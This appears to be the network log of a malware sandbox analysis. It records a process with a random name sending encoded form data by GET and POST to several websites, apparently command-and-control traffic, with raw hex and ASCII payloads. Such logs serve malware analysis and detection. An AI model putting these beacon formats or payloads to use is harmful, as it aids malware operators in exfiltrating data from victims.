                                                                                                                                                    Oct 4, 2024 11:59:22.376099110 CEST434OUTGET /y6iz/?PbG=zhQ7Ngng1ztc3XJZIHU9Y/47AI96U2d0+kXKRZ9IAQQLMCXY95UFdstJ1SRqr3k6kIeJ8f3iCIfwSA0tHDQugE4jqofP6h0k5CYKv8JwRObuJO4PUIsN08g=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 11:59:22.696135044 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:09:06 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    21192.168.11.204975331.217.192.158801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:33.457011938 CEST693OUTPOST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 6a 61 48 45 4b 6a 63 69 4d 63 37 6a 31 44 53 77 42 36 46 63 69 67 30 39 69 48 51 43 62 5a 30 7a 70 6c 6c 42 6e 43 35 78 6d 59 73 63 4a 57 42 64 63 34 78 65 65 35 76 67 73 62 58 31 72 4f 34 74 4c 50 34 61 4f 51 6d 69 45 46 6c 36 50 53 6e 42 42 54 58 39 76 62 53 6f 58 69 38 53 30 75 62 4e 32 51 58 58 36 53 41 67 6c 6b 4d 72 37 79 76 52 6f 41 2b 48 52 4d 63 2b 44 74 75 4a 39 30 51 46 54 6d 7a 77 7a 71 51 6e 4f 4b 78 6e 59 42 56 65 58 76 67 78 33 73 52 41 63 49 50 6a 30 37 61 46 62 37 62 61 73 71 49 45 42 4d 42 78 4d 35 30 4e 39 2b 55 36 4c 72 48 6e 59 66 65 43 6c 4c 2b 47 77 67 3d 3d
                                                                                                                                                    Data Ascii: PbG=jaHEKjciMc7j1DSwB6Fcig09iHQCbZ0zpllBnC5xmYscJWBdc4xee5vgsbX1rO4tLP4aOQmiEFl6PSnBBTX9vbSoXi8S0ubN2QXX6SAglkMr7yvRoA+HRMc+DtuJ90QFTmzwzqQnOKxnYBVeXvgx3sRAcIPj07aFb7basqIEBMBxM50N9+U6LrHnYfeClL+Gwg==
                                                                                                                                                    Oct 4, 2024 11:59:34.102020979 CEST383INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 09:58:44 GMT
                                                                                                                                                    server: LiteSpeed


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    22192.168.11.204975431.217.192.158801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:36.205195904 CEST713OUTPOST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 6a 61 48 45 4b 6a 63 69 4d 63 37 6a 6e 54 69 77 44 62 46 63 6e 41 30 2b 2f 33 51 43 4d 4a 30 33 70 6c 35 42 6e 48 4a 68 6d 71 34 63 48 57 78 64 66 35 78 65 53 5a 76 67 6d 37 58 73 76 4f 35 68 4c 50 45 6b 4f 52 61 69 45 46 78 36 50 51 50 42 55 79 58 2b 74 4c 53 71 65 43 38 63 77 75 62 4e 32 51 58 58 36 53 55 4f 6c 6e 38 72 36 43 2f 52 70 68 2b 49 4e 63 63 39 54 4e 75 4a 35 30 52 4d 54 6d 7a 53 7a 72 4e 41 4f 49 35 6e 59 45 52 65 58 2b 67 79 39 73 51 4c 59 49 4f 6f 34 37 58 4c 57 6f 62 6e 39 61 64 61 47 76 46 50 45 50 6c 58 67 4d 67 65 49 34 62 56 63 76 6e 71 6e 4a 2f 64 74 74 6f 45 33 53 59 31 47 67 31 55 42 7a 73 50 79 69 44 42 73 57 67 3d
                                                                                                                                                    Data Ascii: PbG=jaHEKjciMc7jnTiwDbFcnA0+/3QCMJ03pl5BnHJhmq4cHWxdf5xeSZvgm7XsvO5hLPEkORaiEFx6PQPBUyX+tLSqeC8cwubN2QXX6SUOln8r6C/Rph+INcc9TNuJ50RMTmzSzrNAOI5nYEReX+gy9sQLYIOo47XLWobn9adaGvFPEPlXgMgeI4bVcvnqnJ/dttoE3SY1Gg1UBzsPyiDBsWg=
                                                                                                                                                    Oct 4, 2024 11:59:36.962382078 CEST383INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 09:58:47 GMT
                                                                                                                                                    server: LiteSpeed


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    23192.168.11.204975531.217.192.158801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:38.947175980 CEST1289OUTPOST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 6a 61 48 45 4b 6a 63 69 4d 63 37 6a 6e 54 69 77 44 62 46 63 6e 41 30 2b 2f 33 51 43 4d 4a 30 33 70 6c 35 42 6e 48 4a 68 6d 72 41 63 48 6b 35 64 4e 61 4a 65 54 5a 76 67 71 62 58 70 76 4f 35 6f 4c 50 73 6f 4f 52 57 79 45 41 31 36 4a 44 33 42 51 32 6a 2b 33 62 53 71 42 53 38 52 30 75 62 59 32 51 48 54 36 53 45 4f 6c 6e 38 72 36 48 7a 52 75 77 2b 49 50 63 63 2b 44 74 75 46 39 30 52 6b 54 6d 72 6f 7a 72 5a 36 4f 34 5a 6e 5a 6b 68 65 52 4d 49 79 67 38 51 4a 66 49 4f 37 34 37 62 41 57 6f 48 52 39 61 6f 33 47 73 31 50 48 4a 56 4c 34 50 34 2f 55 50 69 43 51 4e 6e 39 32 36 62 55 73 76 56 35 6d 44 5a 5a 46 6c 74 42 42 69 78 43 70 51 2f 46 76 43 47 36 6c 36 43 50 30 45 57 74 44 72 75 72 6f 75 4f 39 67 68 35 73 49 54 69 47 56 6a 7a 42 61 32 73 36 4e 56 46 37 67 6d 57 63 4f 4b 32 32 4c 58 47 48 41 6d 4b 51 2f 57 6a 59 6f 69 6f 4e 70 47 56 78 51 33 38 32 2b 62 2b 4c 36 74 71 75 4a 36 72 6b 51 30 75 54 79 6f 50 46 51 56 7a 4e 59 58 70 74 7a 68 59 4f 50 43 46 50 50 69 76 62 73 65 6d 63 59 37 70 37 75 78 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=jaHEKjciMc7jnTiwDbFcnA0+/3QCMJ03pl5BnHJhmrAcHk5dNaJeTZvgqbXpvO5oLPsoORWyEA16JD3BQ2j+3bSqBS8R0ubY2QHT6SEOln8r6HzRuw+IPcc+DtuF90RkTmrozrZ6O4ZnZkheRMIyg8QJfIO747bAWoHR9ao3Gs1PHJVL4P4/UPiCQNn926bUsvV5mDZZFltBBixCpQ/FvCG6l6CP0EWtDrurouO9gh5sITiGVjzBa2s6NVF7gmWcOK22LXGHAmKQ/WjYoioNpGVxQ382+b+L6tquJ6rkQ0uTyoPFQVzNYXptzhYOPCFPPivbsemcY7p7uxa09FNhWH0nLL6Mg2cb9Y5C02xmOOJhDQ1Zxx5MdL/DnStk/F9sK8kFEdOvu1/knktotfJVlSRdSdjk2WJ804m80eTAbM01dJMtONXOOcl+nJMCcZBQhQitLTpD95c3azrcsFWTcpheK/UdM0zEDMETpdKpBWufyf75ZFrTTJ6KdNNX5aP8htfdsSqClVuYczJVtdZqGelPgkS+VG6VkaLrtFFCwXTMQH1U8xyfBBYc6s7Readxl1tWVc2YeA0XmUJDT2AB7WFpVMz2fG8IAnCSCBc1QO9YtZJZhAZq84/lLMUOVNDoKjRQ18LoJm/DUHpmSG+kfbF6KSwJGAFoTiIiNAFzny8F5fSCf/4Jk+tmzhM1J2tyfLaAf7d8B7gFa4EAQu+dMeivyL6Eon6ECdQFsuMc+YWb15NxwRhVoHc1dcGrkvkhk4GiaJB7gYEcmali54Eaak2
                                                                                                                                                    Oct 4, 2024 11:59:38.947225094 CEST5629OUTData Raw: 4d 36 65 34 56 37 4f 58 44 50 74 39 46 77 4a 57 55 32 48 65 2f 46 67 56 36 34 55 78 67 74 4d 41 4c 31 79 70 4d 36 4b 32 66 76 42 68 69 46 49 68 43 76 5a 72 6b 6e 34 56 75 54 59 6b 65 4f 58 71 4d 5a 38 7a 33 53 6f 71 32 45 2f 68 33 34 5a 5a 79 6b
                                                                                                                                                    Data Ascii: M6e4V7OXDPt9FwJWU2He/FgV64UxgtMAL1ypM6K2fvBhiFIhCvZrkn4VuTYkeOXqMZ8z3Soq2E/h34ZZykJ2VyYWvOVE/i8JyZEqmuEXTy/v03vVMV9D+mcWRELVUtrk8mchmtWRWEeMUYeEXrbaVXxot1DIRevYpDgzX3eV3oc6zfaauO0ILZwobP7NitDucHXL5MWdYjbfqUoaUdpiraljSg0mX5Ooc65C1RjJMuArJb/zQtt
                                                                                                                                                    Oct 4, 2024 11:59:39.616698027 CEST383INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 09:58:49 GMT
                                                                                                                                                    server: LiteSpeed


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    24192.168.11.204975631.217.192.158801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:41.672863007 CEST429OUTGET /h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 11:59:42.268728971 CEST526INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 09:58:52 GMT
                                                                                                                                                    server: LiteSpeed


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    25192.168.11.2049757191.101.104.164801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:47.847079992 CEST690OUTPOST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 47 79 6b 69 79 30 70 75 4b 42 41 64 4a 78 35 50 50 53 65 44 31 2b 38 6a 51 72 37 61 52 2b 66 78 55 73 52 64 50 42 78 2f 44 67 73 57 68 50 54 49 43 2b 4c 71 58 4c 4f 72 55 69 38 6d 50 71 36 47 67 36 56 63 6c 53 36 4d 77 53 32 35 41 6c 54 61 53 43 6d 2b 70 6a 2f 33 49 38 46 36 53 53 67 65 42 59 4c 4e 4b 53 49 7a 61 2b 56 30 74 56 79 30 45 52 56 76 45 33 6e 53 53 38 76 46 55 72 7a 57 52 45 38 30 74 69 7a 4d 5a 55 44 54 56 6f 36 49 6a 32 6d 4c 52 56 58 75 78 53 69 4e 4b 6f 58 63 6a 79 6d 69 75 63 62 6c 5a 38 45 46 42 65 4c 44 79 46 34 2b 37 64 6a 73 77 63 43 63 75 61 30 6b 62 51 3d 3d
                                                                                                                                                    Data Ascii: PbG=Gykiy0puKBAdJx5PPSeD1+8jQr7aR+fxUsRdPBx/DgsWhPTIC+LqXLOrUi8mPq6Gg6VclS6MwS25AlTaSCm+pj/3I8F6SSgeBYLNKSIza+V0tVy0ERVvE3nSS8vFUrzWRE80tizMZUDTVo6Ij2mLRVXuxSiNKoXcjymiucblZ8EFBeLDyF4+7djswcCcua0kbQ==
                                                                                                                                                    Oct 4, 2024 11:59:48.483172894 CEST1227INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:59:48 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 795
                                                                                                                                                    Connection: close
                                                                                                                                                    location: https://www.taketechai.com/6s2u/
                                                                                                                                                    platform: hostinger
                                                                                                                                                    panel: hpanel
                                                                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 84ecbcc4745dbe8cdac0c751dae85b57-bos-edge3
                                                                                                                                                    x-hcdn-cache-status: DYNAMIC
                                                                                                                                                    x-hcdn-upstream-rt: 0.535
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    26192.168.11.2049758191.101.104.164801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:50.477895021 CEST710OUTPOST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 47 79 6b 69 79 30 70 75 4b 42 41 64 4c 52 70 50 4e 31 79 44 7a 65 38 73 4f 37 37 61 49 75 66 39 55 73 64 64 50 41 31 57 43 56 45 57 67 76 6a 49 44 2f 4c 71 61 72 4f 72 4d 79 38 6a 41 4b 36 37 67 39 63 68 6c 54 47 4d 77 53 79 35 41 68 58 61 54 78 65 78 72 7a 2f 31 51 4d 46 34 57 53 67 65 42 59 4c 4e 4b 57 68 57 61 2b 4e 30 74 46 43 30 4c 51 56 6f 61 6e 6e 56 58 4d 76 46 46 62 7a 53 52 45 39 68 74 6a 76 32 5a 52 48 54 56 70 4b 49 6a 6b 65 49 49 6c 58 6b 38 79 6a 69 43 71 6d 78 6b 41 53 65 6d 63 66 66 65 75 77 42 4e 6f 61 5a 76 33 4d 61 34 4f 2f 65 30 73 37 30 73 59 31 2f 47 58 72 79 4b 66 59 47 4d 46 48 31 70 36 7a 52 38 4a 43 49 35 62 30 3d
                                                                                                                                                    Data Ascii: PbG=Gykiy0puKBAdLRpPN1yDze8sO77aIuf9UsddPA1WCVEWgvjID/LqarOrMy8jAK67g9chlTGMwSy5AhXaTxexrz/1QMF4WSgeBYLNKWhWa+N0tFC0LQVoannVXMvFFbzSRE9htjv2ZRHTVpKIjkeIIlXk8yjiCqmxkASemcffeuwBNoaZv3Ma4O/e0s70sY1/GXryKfYGMFH1p6zR8JCI5b0=
                                                                                                                                                    Oct 4, 2024 11:59:51.099893093 CEST1227INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:59:51 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 795
                                                                                                                                                    Connection: close
                                                                                                                                                    location: https://www.taketechai.com/6s2u/
                                                                                                                                                    platform: hostinger
                                                                                                                                                    panel: hpanel
                                                                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 165517dcc5785c231239468c03a282f6-bos-edge2
                                                                                                                                                    x-hcdn-cache-status: DYNAMIC
                                                                                                                                                    x-hcdn-upstream-rt: 0.521
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    27192.168.11.2049759191.101.104.164801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:53.101613045 CEST2578OUTPOST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
